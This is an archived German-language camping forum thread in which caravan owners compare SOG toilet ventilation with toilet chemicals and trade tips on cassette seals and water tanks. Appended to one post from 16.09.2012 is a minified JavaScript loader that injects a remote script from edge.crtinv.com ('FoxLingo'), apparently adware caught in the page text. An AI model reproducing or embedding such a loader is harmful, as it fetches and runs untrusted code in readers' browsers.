PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : SOG oder Chemie



dreamflyer
13.09.2012, 18:34
Hallo Camper!

Waren heuer länger auf Tour (bei teil gefüllter Cassette - aber nur Produkte von "kleinen Geschäften"). Irgendwie hat die Chemie (OneChem) nicht wirklich gewirkt. Es hat - auf gut steirisch "im Heisl a wenk brunzerlt :o:o ".

Hilft mir da die SOG oder wird ihr im sonnigen Gefilden auch zu heiß? :confused::confused:

- oder war es nur die falsche Chemie?

Danke für Eure Tipps!

Lg

Michi

igPuk
13.09.2012, 19:23
Hallo Camper!

Waren heuer länger auf Tour (bei teil gefüllter Cassette - aber nur Produkte von "kleinen Geschäften"). Irgendwie hat die Chemie (OneChem) nicht wirklich gewirkt. Es hat - auf gut steirisch "im Heisl a wenk brunzerlt :o:o ".

Hilft mir da die SOG oder wird ihr im sonnigen Gefilden auch zu heiß? :confused::confused:

- oder war es nur die falsche Chemie?

Danke für Eure Tipps!

Lg

Michi

Hallo, wir haben nur die Sog und keine Probleme.

Superglide
13.09.2012, 20:32
- oder war es nur die falsche Chemie?

ich als "nicht sog-benutzer" würde sagen die falsche chemie!
nimm die blaue(nicht die grüne!!!) von aqua kem in der richtigen dosierung und gut ist es.
fahre schon seit vielen jahren in den warmen süden und bin mit der "blauen" immer zufrieden gewesen.

rotti
13.09.2012, 20:43
Hallo Michi !

Nimm einfach mal die http://www.amazon.de/Dometic-Power-Care-Sanit%C3%A4rzusatz-St%C3%BCck/dp/B004D8OZUQ

Dometic Power Care Kugeln. Wir hatten die heuer im Sommer im Einsatz. Ich kenne nichts besseres. Hatte schon sämtliche Chemie die es am Markt gibt im Einsatz. So einfach, so wirksam wie diese Kugeln sind kenn ich von keiner flüssigen Chemie. Auch nach 3 oder 4 Tagen bei ärgster Hitze stinkt da noch nichts beim kleinen Geschäft. Große Geschäfte kann ich nicht beurteilen :D:D

LG
Mathias

lupi98
13.09.2012, 20:47
hallo .blaue aqua chem nehmen,ich nehme statt wie vorgeschrieben ( ich glaube um 200 ml ) viel weniger ( da meist nur kleines geschäft ) und funktioniert wunderbar ( auch im heissen süden ) leere so meist nach 2-3 tagen die cassette aus ,

also wennst ca 100 ml ( oder auch weniger ) nimmt ,passt das schon ,gruß klaus

Allesfahrer
13.09.2012, 21:21
Hallo!

Beim alten WoWa hatten wir beim WC einen eigenen Spülwassertank da habe ich rosa (oben) mit blau (unten) kombiniert.

Beim jetzigen WoWa kommt das Spülwassser aus dem Frischwassertank und ich nehm nur noch grün unten.

Hab bis jetzt noch keine Probleme gehabt. Entleert wird wenn es voll ist, und das kann schon mal länger dauern wenn nur 3 Personen (1ER +2KI) nur klein in der Nacht gehen. Tagsüber wird eh die Sanitär am CP genutzt.

Am wichtigsten finde ich das die Dichtungen richtig schließen! ;)

gerilu
13.09.2012, 21:43
SOG !!

Und im Sommer, wenn es echt heiß ist - doch ein klein wenig Chemie zusätzlich ....

da kannst dann Groß und Klein und es "brutzelt" dir nicht mehr sofort die Nasenhaare weg ...

Tirolergruß
gerilu

Asterix
13.09.2012, 22:57
- oder war es nur die falsche Chemie?

Hallo Michi,
wir verwenden seit Jahren Aqua Kem Sachets
http://pusch.camping-profi.de/product_info.php?cat=c1096_Sanit-rmittel.html&info=p724_Aqua-Kem-Sachets.html&XTCsid=695f8b9fc869dd0607ecb742b7e7998a
Vor der Erstbenutzung etwas Wasser und einige Tropfen Zitronenöl drauf...fertig!
No problem

lG Asterix

tojamata
13.09.2012, 23:59
servus,

sog und gut ists!

westbahnmichi
14.09.2012, 08:53
ich als "nicht sog-benutzer" würde sagen die falsche chemie!
nimm die blaue(nicht die grüne!!!) von aqua kem in der richtigen dosierung und gut ist es.



Hallo

wir machen es genau so, hatten noch nie irgendwelche geruchspropleme!!!!

AndyT
14.09.2012, 09:14
ich als "nicht sog-benutzer" würde sagen die falsche chemie!
nimm die blaue(nicht die grüne!!!) von aqua kem in der richtigen dosierung und gut ist es.
fahre schon seit vielen jahren in den warmen süden und bin mit der "blauen" immer zufrieden gewesen.

Hallo :)

genau so und nicht anders, obwohl ich die Dosierung etwas geringer halte. Am zweiten Tag spätestens am dritten Tag muß ich ja sowieso ausleeren.
Ist der Tank ist komplett voll riecht man es ein wenig, aber da kommt schon das Kommando....alter geh......:eek::D:rolleyes:

always_camping
14.09.2012, 09:27
Wie sieht das eigentlich mit dem Wassertank aus? Ich bin Neu(camping)wagen-Besitzer und mache mir auch schon ein wenig Sorgen über die Problematik des Trinkwassers gemacht nachdem ich den Artikel hier bei multiman.de gelesen habe. Was hilft denn bei der Reinigung am Besten? Ich bin da leider noch nicht so ganz in der Sache drin, aber möchte solche Sachen wie im Artikel beschrieben vermeiden für nächstes Jahr.

gerilu
14.09.2012, 10:40
Wie sieht das eigentlich mit dem Wassertank aus? Ich bin Neu(camping)wagen-Besitzer und mache mir auch schon ein wenig Sorgen über die Problematik des Trinkwassers gemacht nachdem ich den Artikel hier bei multiman.de gelesen habe. Was hilft denn bei der Reinigung am Besten? Ich bin da leider noch nicht so ganz in der Sache drin, aber möchte solche Sachen wie im Artikel beschrieben vermeiden für nächstes Jahr.

Danke für die Werbung ......!!
"Willkommen im Forum" - keine Ahnung, ob überhaupt angebracht - sorry !!

Camper und Wasser - ein Thema, bei dem man nicht auf "Angst" machen muss, da sich beinahe alle der möglichen Problematik bewusst sind und dementsprechend agieren !!

Niemand braucht einen "kauft meine Produkte sonst müsst ihr womöglich sterben Werber" !!

Tirolergruß
gerilu

STO
14.09.2012, 10:57
Am wichtigsten finde ich das die Dichtungen richtig schließen! ;)

genau. wir haben weder chemie noch sog und nix stinkt.

westbahnmichi
14.09.2012, 11:09
Wie sieht das eigentlich mit dem Wassertank aus? Ich bin Neu(camping)wagen-Besitzer und mache mir auch schon ein wenig Sorgen über die Problematik des Trinkwassers gemacht nachdem ich den Artikel hier bei multiman.de (http://www.multiman.de/produkte/multibox.html) gelesen habe. Was hilft denn bei der Reinigung am Besten? Ich bin da leider noch nicht so ganz in der Sache drin, aber möchte solche Sachen wie im Artikel beschrieben vermeiden für nächstes Jahr.

Hallo

vorerst einmal herzlich willkommen hier bei uns im forum!!!

bezüglich frischwassertank, einmal im jahr mit corega tabs durschspülen und fertig, unser tank hat noch NIE eine chemie bekommen!!!

Wienerwald-Jo
14.09.2012, 12:02
Hallo

vorerst einmal herzlich willkommen hier bei uns im forum!!!

bezüglich frischwassertank, einmal im jahr mit corega tabs durschspülen und fertig, unser tank hat noch NIE eine chemie bekommen!!!

;):rolleyes:;)und für die "Beisserchen" nehmen wir Aqua-Chem;):rolleyes:;)
JO

alfahel
14.09.2012, 12:20
Mahlzeit!
Hallo auch von uns hier im Forum!
Also wir haben auch die SOG
kein Prob!
Einmal im Jahr spüle ich den Tank mit Apfelessig und dann mit normalen Spülmittel einen Tag eingeweicht ------> nema problema! :D:D:D:D:D
Nur der Aktivkohlefilter solle von zeit zu zeit gewechselt werden sonst hats keinen Sinn!
Und die Zahntabs brauch ich nicht weder fürn Tank noch für die Zähne :p:D:D:D:D:p;););)

igPuk
14.09.2012, 12:58
Wie sieht das eigentlich mit dem Wassertank aus? Ich bin Neu(camping)wagen-Besitzer und mache mir auch schon ein wenig Sorgen über die Problematik des Trinkwassers gemacht nachdem ich den Artikel hier bei multiman.de (http://www.multiman.de/produkte/multibox.html) gelesen habe. Was hilft denn bei der Reinigung am Besten? Ich bin da leider noch nicht so ganz in der Sache drin, aber möchte solche Sachen wie im Artikel beschrieben vermeiden für nächstes Jahr.
Hallo.
Trinkwasser gibt es einen ca 20l Kanister in der Garage und mit einer 12v Tauchpumpe
in den Wohnraum geleitet mit Schalter.
Orig.Tank haben wir noch nie Trinkwasser entnommen nur zum Duschen usw.

abo
14.09.2012, 16:06
hi

trinkwasser aus 2liter PET flaschen
tankwasser nur dann wenn es abgekocht wird ..

lg
g

garmin12
15.09.2012, 10:05
hi

trinkwasser aus 2liter PET flaschen
tankwasser nur dann wenn es abgekocht wird ..

lg
g

Das unterschreib ich zu 100%

Skorpion
15.09.2012, 11:56
hi

trinkwasser aus 2liter PET flaschen
tankwasser nur dann wenn es abgekocht wird ..

lg
g

Dem schließ ich mich auch an

weissfranz
15.09.2012, 16:47
Nie mehr ohne SOG.
Wir benutzen fast nur die Bordtoilette (Camping WCs sind uns meist zu dreckig) und stehen viel frei. Nach dem entleeren kommt eine Kappe Schmierseife in den WC Tank (zwecks Reinigung). Das blaue Aqua Cem ist halt das reinste Gift für jede Kläranlage.
Wichtig alle 2 Jahre wechseln wir die Dichtung und den Kohlefilter.

Freetec 598
15.09.2012, 19:42
Hallo Camper!

Waren heuer länger auf Tour (bei teil gefüllter Cassette - aber nur Produkte von "kleinen Geschäften"). Irgendwie hat die Chemie (OneChem) nicht wirklich gewirkt. Es hat - auf gut steirisch "im Heisl a wenk brunzerlt :o:o ".

Hilft mir da die SOG oder wird ihr im sonnigen Gefilden auch zu heiß? :confused::confused:

- oder war es nur die falsche Chemie?

Danke für Eure Tipps!

Lg

Michi

Hallo Michi,

wenn es im WOMO "brunzelt",
hängt es wahrscheinlich mit alten, porösen oder ungepflegten Dichtungen an der Cassette
zusammen oder, wenn alle reinpiseln, aber keiner die Schüssel nach dem Piseln spült
und anschließend abtrocknet.
Die SOG hilft Dir nur, wenn große Geschäfte im WOMO erledigt werden, werden müssen. ;)
Nur dafür ist sie da.
Die Cassette sollte nach ca. 3 Tagen geleert werden, egal wie voll sie ist.
Zumindest halten wir es seit über 5 Jahren so und bisher riecht man die Toilette nicht
im Geringsten.:)

thoreau
15.09.2012, 21:46
Dieses Thema beschäftigt offenbar so ziemlich alle Campingforen recht intensiv.

Es gibt - natürlich nur nach meinem Dafürhalten - nichts besseres, als SOG.

Keine Chemie, kein Stinken (außer beim Ausleeren), wirklich sehr komfortabel.

Ich mechat nichts andres mehr.

Wenn wer was anderes bevorzugt, sein Kaffee, egal ob Chemie, Schwarzwassertank oder Häcksler, wird alles seine Richtigkeit haben.

Somit sollte jeder mit seiner Vorgehensweise glücklich sein und niemanden bekehren müssen.

Lieben Gruß

thoreau

Helmi
16.09.2012, 07:14
Ich bin mal wegen Sog umgezogen mit meinen Zelt.
Neben mir stelle sich ein Wohnwagen, der stank, das war nicht auszuhalten.
Ein anderer Camper sagt dann, der hat den Filter von seiner Toilette nich gewechselt.

Euro-Joe
16.09.2012, 13:04
Hallo Michi,

wenn es im WOMO "brunzelt",
hängt es wahrscheinlich mit alten, porösen oder ungepflegten Dichtungen an der Cassette
zusammen oder, wenn alle reinpiseln, aber keiner die Schüssel nach dem Piseln spült
und anschließend abtrocknet.
Die SOG hilft Dir nur, wenn große Geschäfte im WOMO erledigt werden, werden müssen. ;)
Nur dafür ist sie da.
Die Cassette sollte nach ca. 3 Tagen geleert werden, egal wie voll sie ist.
Zumindest halten wir es seit über 5 Jahren so und bisher riecht man die Toilette nicht
im Geringsten.:)

Woher hast du diese Weisheit? SOG verhindert durch den Aufbau von Unterdruck das Austreten von Gerüchen aus der Kassette ähnlich dem Siphon bei normalen Toiletten. Eine gewisse Geruchbelästigung beim Verrichten des Geschäftes kann da wie dort nicht verhindert werden.

gary
16.09.2012, 13:17
Eine gewisse Geruchbelästigung beim Verrichten des Geschäftes kann da wie dort nicht verhindert werden.

echt??? sag grad es stinkts beim schei... :confused::D:D:D

Hobbycamper
16.09.2012, 14:01
Noch eine weitere Frage zu diesem Thema

Wie oft sollte die Dichtung der Kassette gewechselt werden ??

einige behaupten dies alle 2 - 3 Jahre zu tun

thoreau
16.09.2012, 15:50
Woher hast du diese Weisheit? SOG verhindert durch den Aufbau von Unterdruck das Austreten von Gerüchen aus der Kassette ähnlich dem Siphon bei normalen Toiletten. Eine gewisse Geruchbelästigung beim Verrichten des Geschäftes kann da wie dort nicht verhindert werden.

Stimmt nicht.

Durch SOG wird ein ständiger Unterdruck erzeugt, wodurch alle Gerüche abgesaugt werden. Außerdem wäre es mir neu, dass durch den Syphon ein ständiger Unterdruck erzeugt wird.

Lieben Gruß

thoreau

derfranze
16.09.2012, 17:07
Stimmt nicht.

Durch SOG wird ein ständiger Unterdruck erzeugt, wodurch alle Gerüche abgesaugt werden. Außerdem wäre es mir neu, dass durch den Syphon ein ständiger Unterdruck erzeugt wird.

Lieben Gruß

thoreau

Unterdruck wird nicht gebildet, aber ein Syphon ist tatsächlich ein "Geruchverschluß" gegenüber dem Kanal. Und ich glaub eher, dass der Verfasser des Vergleiches die Wirkung und nicht die Funktion als Vergleich heranzog.

lg Franz

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

thoreau
16.09.2012, 21:06
.......ähnlich einem Syphon.......

Soweit ich der deutschen Sprache mächtig bin, wird hier der Bezug zu einem vergleichenden Unterdruck hergestellt, den es natürlich nicht gibt. Wird aber insofern wurscht sein, als der Verfasser entweder keine Ahnung von SOG hat, oder er schlicht und einfach einen Userfehler bei der Bedienung macht, denn Gerüche sind absolut keine vorhanden, weder vorher, noch während der Sitzung und auch nicht nachher.

Wir nutzen ausschließlich das WC im Wohnmobil, egal, welcher Campingplatz, und das seit etwa einem Jahr - nichts ist mit Geruch, auch ohne Chemie.

Lieben Gruß

thoreau

Euro-Joe
16.09.2012, 21:16
ary,
Stimmt nicht.

Durch SOG wird ein ständiger Unterdruck erzeugt, wodurch alle Gerüche abgesaugt werden. Außerdem wäre es mir neu, dass durch den Syphon ein ständiger Unterdruck erzeugt wird.

Lieben Gruß

thoreau

"SOG verhindert durch den Aufbau von Unterdruck das Austreten von Gerüchen aus der Kassette ähnlich dem Siphon bei normalen Toiletten."

Ich zitiere mich selbst, ich glaube schon nur den Nutzen und nicht die Technik verglichen zu haben.

@gary wie war, es stinkt halt mal beim sch.....:D

@ thoreau, ich bewundere deine Deutschkenntnisse nur mit deinem Geruchssinn möchte ich nicht tauschen.

Allesfahrer
16.09.2012, 22:00
Also die Wirkung der SOG will ich sicher nicht in Frage stellen!
Bei uns ist es allerdings so das im WoWa am CP nur in der Nacht wenn es umbedingt sein muss klein gegangen wird, groß eigentlich nie (bis auf wenige Ausnahmen).
Dazu kommt das die SOG bei uns in das Vorzelt, bzw genau zum Tisch wenn wir kein Vorzelt aufgestellt haben, blasen würde. Und auf das kann ich gerne verzichten.
Ich habe viel überlegt ob ich mir eine SOG einbaue, aber aus vorher genannten Günden werde ich es nicht tuen und weiter mit der grünen CHEM arbeiten.

tullnerfelder
17.09.2012, 00:45
Hallo Michi,
der Meinung von Allesfahrer kann ich mich anschließen, nur dass ich die blaue Chemie verwende.

:D:D Übrigens: Wer die Cassette entleert, der braucht nicht abwaschen. :D:D

STO
17.09.2012, 00:51
:D:D Übrigens: Wer die Cassette entleert, der braucht nicht abwaschen. :D:D

ich nehm an, du meinst das als crew-regel und nicht als geschirrspuelerersatz :D

tullnerfelder
17.09.2012, 00:54
@STO
so is es.
Ich wasche auch ab.

thoreau
17.09.2012, 08:26
@ thoreau, ich bewundere deine Deutschkenntnisse nur mit deinem Geruchssinn möchte ich nicht tauschen.

Du hast SOG?

Wenn ja, dann solltest an deiner Technik arbeiten.

Wenn nein, dann ist auch alles klar :)

Lieben Gruß

thoreau

dreamflyer
18.09.2012, 18:24
Danke für Eure Erfahrungen. Ich nehme für mich dass es stinkt beim sch.... :D:D:D -
Und dass ich in jedem Fall die Dichtung der Kassette tausche. Ist ja schon 3 Jahre alt.

Lg & Danke

Achja: SCH...t du auf Nachbars Parzelle - mußt weiterfahren ganz schnelle :p:p:p

Freetec 598
20.09.2012, 13:40
.......ähnlich einem Syphon.......

Soweit ich der deutschen Sprache mächtig bin, wird hier der Bezug zu einem vergleichenden Unterdruck hergestellt, den es natürlich nicht gibt. Wird aber insofern wurscht sein, als der Verfasser entweder keine Ahnung von SOG hat, oder er schlicht und einfach einen Userfehler bei der Bedienung macht, denn Gerüche sind absolut keine vorhanden, weder vorher, noch während der Sitzung und auch nicht nachher.

Wir nutzen ausschließlich das WC im Wohnmobil, egal, welcher Campingplatz, und das seit etwa einem Jahr - nichts ist mit Geruch, auch ohne Chemie.

Lieben Gruß

thoreau

Danke !
Genau so ist es.:)

Allesfahrer
20.09.2012, 20:35
Gerüche sind absolut keine vorhanden, weder vorher, noch während der Sitzung und auch nicht nachher.


Kannst du mir bitte das Geheimnis deiner Ernährung verraten? :confused:

garmin12
21.09.2012, 08:11
Und dass ich in jedem Fall die Dichtung der Kassette tausche. Ist ja schon 3 Jahre alt.


Es gibt ein Mittel zum Reinigen und Entkalken der Kassette. Hat bei uns Wunder gewirkt, ohne neue Dichtung.

46erkurt
21.09.2012, 09:16
Meine Cassettendichtung ist mittlewreile acht Jahre alt und noch immer dicht und nicht spröde. Wieso sollte ich sie alle zwei Jahre wechseln? Hie und da mit Silikonspray einsprühen- fertig!

STO
21.09.2012, 11:22
mittlewreile acht Jahre alt

ich biete 13 Jahre mehr ;)

Freetec 598
21.09.2012, 11:22
Es gibt ein Mittel zum Reinigen und Entkalken der Kassette. Hat bei uns Wunder gewirkt, ohne neue Dichtung.

Hallo Robert,

bitte laß uns nicht dumm sterben.
Welches geheimnisvolle Wundermittel verwendest Du ?

thoreau
21.09.2012, 21:39
Kannst du mir bitte das Geheimnis deiner Ernährung verraten? :confused:

SOG-tauglich.

Lieben Gruß

thoreau

garmin12
23.09.2012, 19:59
Hallo Robert,

bitte laß uns nicht dumm sterben.
Welches geheimnisvolle Wundermittel verwendest Du ?

Von thetford den casseten reiniger: http://www.thetford.eu/upload/111711_622_1187768629361-Cassettetankcleaner_1L_vrij_LR.jpg
Und nach dem silikonspray für die dichtung

Freetec 598
23.09.2012, 22:03
Von thetford den casseten reiniger: http://www.thetford.eu/upload/111711_622_1187768629361-Cassettetankcleaner_1L_vrij_LR.jpg
Und nach dem silikonspray für die dichtung

Danke,

den nutzen wir auch.
Ich dachte, es gäbe noch etwas besseres.

garmin12
24.09.2012, 07:01
Danke,

den nutzen wir auch.
Ich dachte, es gäbe noch etwas besseres.

Also eigentlich bin ich damit sehr zufrieden
Ich füll den immer mit warmen Wasser ein und stell den Tank dann in die Sonne (Verschluß leicht offen) und schüttel ihn relativ oft. Am nächsten Tag sind alle Beläge weg und der Tank schaut innen aus wie neu.

Freetec 598
24.09.2012, 07:21
Also eigentlich bin ich damit sehr zufrieden
Ich füll den immer mit warmen Wasser ein und stell den Tank dann in die Sonne (Verschluß leicht offen) und schüttel ihn relativ oft. Am nächsten Tag sind alle Beläge weg und der Tank schaut innen aus wie neu.

Ganz genau so mache ich es auch und kann somit Deine Angaben bestätigen.
Nach diesem 24 stündigen Procedere öffne den Tank und lasse diesen noch einmal
24 Stunden lang innen abtrockenen.
Anschließend sprühe ich in dem Tank alle beweglichen Teile
sowie alle Dichtungen mit Silikonöl ein und gut ist es.
Damit haben wir eine Cassette, die auch nach 6 Jahren
immer noch blitzsauber
und wie neu ist.
Auch deshalb keinerlei Gerüche im WOMO-Bad, obwohl ich das blaue Zeug,
welches wir in der Nutzungsphase zugeben,
gerne rieche, es riecht nach einem früher von mir benutzten
Duschmittel, das hieß Algemarin. :D